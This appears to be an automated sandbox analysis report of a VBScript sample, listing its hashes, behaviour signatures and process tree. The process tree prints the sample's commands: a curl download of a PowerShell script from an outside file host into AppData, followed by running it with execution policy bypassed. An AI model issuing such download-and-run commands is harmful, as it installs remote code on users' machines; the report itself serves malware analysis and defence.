Analysis
-
max time kernel
40s -
max time network
29s -
platform
windows7_x64 -
resource
win7-20221111-en -
resource tags
arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system -
submitted
16/01/2023, 07:46
Static task
static1
Behavioral task
behavioral1
Sample
vb.vbs
Resource
win7-20221111-en
4 signatures
150 seconds
General
-
Target
vb.vbs
-
Size
1024KB
-
MD5
ea33785b5feaade952b2768dc1b74d6d
-
SHA1
2611ef2ca512873963550e03e8da3761a3f827da
-
SHA256
664e3869703282407878479b644155607546c786f69cac5718055005c34b8c82
-
SHA512
63745e2ee17ab5cca44eb46c5e7faecc7d2e38831d87c61262d9f4fb8d55d3891d1d9f49443dc07825273c5ca973ab3f6e964b1dae2191fd0cd306cf8a7fae35
-
SSDEEP
12:O+h3awpefnYj5H6NPnqkc+h3awpeZ9nF6NPnJ:O+9xYM5wqh+9xYZly
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1780 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1780 powershell.exe -
Suspicious use of WriteProcessMemory 15 IoCs
description pid Process procid_target PID 2004 wrote to memory of 1424 2004 WScript.exe 28 PID 2004 wrote to memory of 1424 2004 WScript.exe 28 PID 2004 wrote to memory of 1424 2004 WScript.exe 28 PID 1424 wrote to memory of 580 1424 cmd.exe 30 PID 1424 wrote to memory of 580 1424 cmd.exe 30 PID 1424 wrote to memory of 580 1424 cmd.exe 30 PID 2004 wrote to memory of 1876 2004 WScript.exe 31 PID 2004 wrote to memory of 1876 2004 WScript.exe 31 PID 2004 wrote to memory of 1876 2004 WScript.exe 31 PID 1876 wrote to memory of 1616 1876 cmd.exe 33 PID 1876 wrote to memory of 1616 1876 cmd.exe 33 PID 1876 wrote to memory of 1616 1876 cmd.exe 33 PID 1616 wrote to memory of 1780 1616 cmd.exe 34 PID 1616 wrote to memory of 1780 1616 cmd.exe 34 PID 1616 wrote to memory of 1780 1616 cmd.exe 34
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\vb.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:2004 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd.exe /c curl https://files.catbox.moe/nvz0g1.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps12⤵
- Suspicious use of WriteProcessMemory
PID:1424 -
C:\Windows\system32\cmd.execmd.exe /c curl https://files.catbox.moe/nvz0g1.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps13⤵PID:580
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps12⤵
- Suspicious use of WriteProcessMemory
PID:1876 -
C:\Windows\system32\cmd.execmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps13⤵
- Suspicious use of WriteProcessMemory
PID:1616 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps14⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1780
-
-
-